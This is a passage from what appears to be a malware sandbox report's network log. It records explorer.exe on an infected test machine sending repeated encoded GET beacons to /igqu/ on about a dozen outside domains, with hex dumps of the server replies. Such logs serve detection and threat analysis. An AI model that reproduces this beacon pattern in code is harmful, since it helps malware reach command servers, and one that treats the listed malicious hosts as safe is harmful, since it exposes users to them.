                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 31 33 33 38 3b 26 23 32 32 32 36 39 3b 26 23 33 38 34 36 39 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 47 42 4b 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 69 74 65 61 70 70 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 0d 0a 09 09 09 62 6f 64 79 20 7b 0d 0a 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 36 45 41 45 42 3b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 27 ce a2 c8 ed d1 c5 ba da 27 2c 20 27 cb ce cc e5 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 0d 0a 7d 0d 0a 61 7b 0d 0a 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 37 42 37 42 37 42 3b 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 31 30 30 70 78 29 20 7b 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 7b 0d 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 39 36 70 78 20 61 75 74 6f 20 30 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 38 30 70 78 20 38 35 70 78 20 32 32 70 78 3b 0d 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 20 31 30 70 78 20 30 20 30 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 39 70 78 20 31 37 70 78 20 72 67 62 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 0d 0a 09 77 69 64 74 68 3a 20 32 38 36 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 70 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 2d 35 30 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 31 31 70 78 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 37 33 35 3b 0d 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 20 31 73 20 6c 69 6e 65 61 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 31 31 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 39 30 70 78 3b 0d 0a 09 77
                                                                        Data Ascii: <!DOCTYPE html><html><title>&#20122;&#21338;&#22269;&#38469;</title><head><meta charset="GBK"><meta http-equiv="Cache-Control" content="no-siteapp" /><meta http-equiv="Cache-Control" content="no-transform" /><meta name="applicable-device" content="pc,mobile"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /><style>body {margin: 0;padding: 0;background: #E6EAEB;font-family: Arial, '', '', sans-serif}a{ text-decoration: none;color: #7B7B7B;}@media screen and (min-width:1100px) {.alert-box {display: none;position: relative;margin: 96px auto 0;padding: 180px 85px 22px;border-radius: 10px 10px 0 0;background: #FFF;box-shadow: 5px 9px 17px rgba(102,102,102,0.75);width: 286px;color: #FFF;text-align: center}.alert-box p {margin: 0}.alert-circle {position: absolute;top: -50px;left: 111px}.alert-sec-circle {stroke-dashoffset: 0;stroke-dasharray: 735;transition: stroke-dashoffset 1s linear}.alert-sec-text {position: absolute;top: 11px;left: 190px;w


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.7497373.12.202.1880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:21.718597889 CET611OUTGET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.placeduconfort.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:21.831310034 CET618INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:07:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.74976334.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:16.363661051 CET5429OUTGET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.searchnehomes.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:16.486833096 CET5429INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Fri, 20 Nov 2020 10:08:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "5fb6e13a-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.7497643.134.22.6380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:21.799002886 CET5430OUTGET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.happinestbuilders.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:21.912847042 CET5431INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:08:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        12192.168.2.74976552.58.78.1680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:26.980870962 CET5432OUTGET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.hemparcade.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:26.997565985 CET5432INHTTP/1.1 410 Gone
                                                                        Server: openresty/1.13.6.2
                                                                        Date: Fri, 20 Nov 2020 10:07:50 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 6d 70 61 72 63 61 64 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 6d 70 61 72 63 61 64 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.hemparcade.com/' />a </head>9 <body>3a You are being redirected to http://www.hemparcade.coma </body>8</html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.749752160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:31.979074955 CET5366OUTGET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.heartandcrowncloset.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:32.004002094 CET5366INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.749753194.35.122.22680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:38.803448915 CET5367OUTGET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.fahufu.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:38.979562044 CET5368INHTTP/1.1 200 OK
                                                                        Date: Fri, 20 Nov 2020 10:07:38 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.749754104.253.79.7180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:44.378768921 CET5369OUTGET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.the-gongs.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:44.546214104 CET5370INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:07:44 GMT
                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                        Last-Modified: Wed, 11 Nov 2020 11:47:08 GMT
                                                                        ETag: "844-5b3d35aea7a9c"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 2116
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=GB2312
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 67 62 32 33 31 32 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 68 74 6d 6c 2c 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 39 35 25 3b 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 66 33 38 35 34 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 65 6e 74 65 72 20 65 6c 6c 69 70 73 65 2c 20 23 30 61 32 65 33 38 20 30 25 2c 20 23 30 30 30 30 30 30 20 37 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 2c 20 23 30 61 32 65 33 38 20 30 25 2c 20 23 30 30 30 30 30 30 20 37 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 31 30 30 25 3b 7d 70 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 23 63 6c 6f 63 6b 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 68 61 72 65 20 54 65 63 68 20 4d 6f 6e 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 35 30 25 3b 74 6f 70 3a 20 35 30 25 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 63 6f 6c 6f 72 3a 20 23 64 61 66 36 66 66 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 32 30 70 78 20 23 30 61 61 66 65 36 2c 20 30 20 30 20 32 30 70 78 20 72 67 62 61 28 31 30 2c 20 31 37 35 2c 20 32 33 30 2c 20 30 29 3b 7d 23 63 6c 6f 63 6b 20 2e 74 69 6d 65 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 3b 7d 23 63 6c 6f 63 6b 20 2e 64 61 74 65 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 31 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 7d 23 63 6c 6f 63 6b 20 2e 74 65 78 74 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20
                                                                        Data Ascii: <!doctype html><html><head><meta charset="gb2312"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="format-detection" content="telephone=no"><title>404</title><style>html, body{height:95%;}body{background: #0f3854;background: -webkit-radial-gradient(center ellipse, #0a2e38 0%, #000000 70%);background: radial-gradient(ellipse at center, #0a2e38 0%, #000000 70%);background-size: 100%;}p{margin:0;padding:0;}#clock{font-family: 'Share Tech Mono', monospace;color: #ffffff;text-align: center;position: absolute;left: 50%;top: 50%;-webkit-transform: translate(-50%, -50%);transform: translate(-50%, -50%);color: #daf6ff;text-shadow: 0 0 20px #0aafe6, 0 0 20px rgba(10, 175, 230, 0);}#clock .time{letter-spacing: 0.05em;font-size: 60px;padding: 5px 0;}#clock .date{letter-spacing:0.1em;font-size:15px;}#clock .text{letter-spacing:


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.74975635.246.6.10980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:49.679070950 CET5395OUTGET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.shopnicknaks.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:49.761483908 CET5396INHTTP/1.1 301 Moved Permanently
                                                                        Date: Fri, 20 Nov 2020 10:07:49 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        location: https://www.shopnicknaks.com/igqu?7nExDDz=93%2FRz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ%3D%3D&znedzJ=zZ08lr
                                                                        x-wix-request-id: 1605866869.73454800764115109
                                                                        Age: 0
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                        Cache-Control: no-cache
                                                                        Expires: -1
                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgSFlZwT1h+4EK4tuzq33cp,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijl2HyxYZMvqhoRodhfrjmMmWIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI891F5cPV4/7uVPnrpzkrLQfbJaKSXYQ/lskq2jK6SGP,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,qquldgcFrj2n046g4RNSVLBEueY9AnibOH2EZLjRrdE=,Ts+7R/4FijtA6c9psi3FQGZDSpRGFXLWKPmpDzjzFFOTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9n3wTMzaU7zAZzBAj7gVU/QH0ckLmbyjm6dEUakZt5J0lud4WLlKsLIaRlCjaOj8vGQ2Otd3B2C27oTTIAKJtQ==
                                                                        Server: Pepyaka/1.19.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.749758185.201.11.12680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:54.966870070 CET5412OUTGET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.sweetbasilmarketing.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:55.281188011 CET5413INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        X-Powered-By: PHP/7.2.34
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr
                                                                        X-Litespeed-Cache: miss
                                                                        Content-Length: 0
                                                                        Date: Fri, 20 Nov 2020 10:07:55 GMT
                                                                        Server: LiteSpeed


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.74975952.71.133.13080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:00.453313112 CET5415OUTGET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.justsoldbykristen.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:00.556266069 CET5416INHTTP/1.1 301 Moved Permanently
                                                                        Server: openresty/1.17.8.2
                                                                        Date: Fri, 20 Nov 2020 10:08:00 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 175
                                                                        Connection: close
                                                                        Location: https://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.74976013.226.173.8080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
